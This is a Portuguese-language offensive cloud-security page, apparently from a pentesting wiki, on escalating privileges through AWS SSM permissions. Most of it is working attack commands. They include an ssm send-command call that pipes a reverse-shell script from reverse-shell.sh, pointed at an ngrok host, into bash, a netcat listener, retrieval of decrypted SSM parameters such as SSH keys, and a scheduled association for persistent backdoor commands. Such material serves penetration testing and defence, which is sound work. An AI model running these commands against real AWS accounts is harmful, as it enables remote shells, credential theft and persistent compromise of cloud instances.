AWS - SSM Privesc

Reading time: 6 minutes

SSM

Para mais informações sobre SSM, veja:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

ssm:SendCommand

Um atacante com a permissão ssm:SendCommand pode executar comandos em instâncias que estejam executando o Amazon SSM Agent e comprometer a IAM Role em execução nelas.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

Caso você esteja usando esta técnica para escalate privileges dentro de uma instância EC2 já comprometida, você pode simplesmente capturar o rev shell localmente com:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Impacto Potencial: Privesc direto para os EC2 IAM roles anexados às instâncias em execução com SSM Agents.

ssm:StartSession

Um atacante com a permissão ssm:StartSession pode iniciar uma sessão semelhante a SSH em instâncias que executam o Amazon SSM Agent e comprometer o IAM Role em execução no seu interior.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Impacto Potencial: privesc direto para os EC2 IAM roles anexados às instâncias em execução com SSM Agents em funcionamento.

Privesc para ECS

Quando ECS tasks são executadas com ExecuteCommand enabled usuários com permissões suficientes podem usar ecs execute-command para execute a command dentro do container.
De acordo com the documentation isso é feito criando um canal seguro entre o dispositivo que você usa para iniciar o comando “exec” e o container alvo com SSM Session Manager. (SSM Session Manager Plugin necessário para isso funcionar)
Portanto, usuários com ssm:StartSession poderão get a shell inside ECS tasks com essa opção habilitada apenas executando:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Impacto Potencial: Direct privesc para as ECSIAM roles anexadas às tarefas em execução com ExecuteCommand habilitado.

ssm:ResumeSession

Um atacante com a permissão ssm:ResumeSession pode re-iniciar uma sessão tipo SSH em instâncias executando o Amazon SSM Agent com um estado de sessão SSM desconectado e comprometer o IAM Role que estiver sendo executado dentro dela.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Impacto Potencial: Direct privesc para os EC2 IAM roles atribuídos às instâncias em execução com SSM Agents ativos e sessões desconectadas.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

Um atacante com as permissões mencionadas poderá listar os SSM parameters e lê-los em texto plano. Nesses parâmetros você frequentemente pode encontrar informações sensíveis, como chaves SSH ou chaves de API.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Impacto Potencial: Encontrar informações sensíveis dentro dos parâmetros.

ssm:ListCommands

Um atacante com essa permissão pode listar todos os comandos enviados e, com sorte, encontrar informações sensíveis neles.

aws ssm list-commands

Impacto Potencial: Encontrar informações sensíveis dentro das linhas de comando.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Um atacante com essas permissões pode listar todos os commands enviados e read the output gerado, esperando encontrar informações sensíveis nele.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Impacto Potencial: Encontrar informações sensíveis na saída das linhas de comando.

Usando ssm:CreateAssociation

Um atacante com a permissão ssm:CreateAssociation pode criar uma State Manager Association para executar comandos automaticamente em instâncias EC2 gerenciadas pelo SSM. Essas associações podem ser configuradas para serem executadas em intervalos fixos, tornando-as adequadas para persistência tipo backdoor sem sessões interativas.

aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name

Codebuild

Você também pode usar o SSM para obter acesso a um projeto codebuild durante a sua construção:

AWS - Codebuild Privesc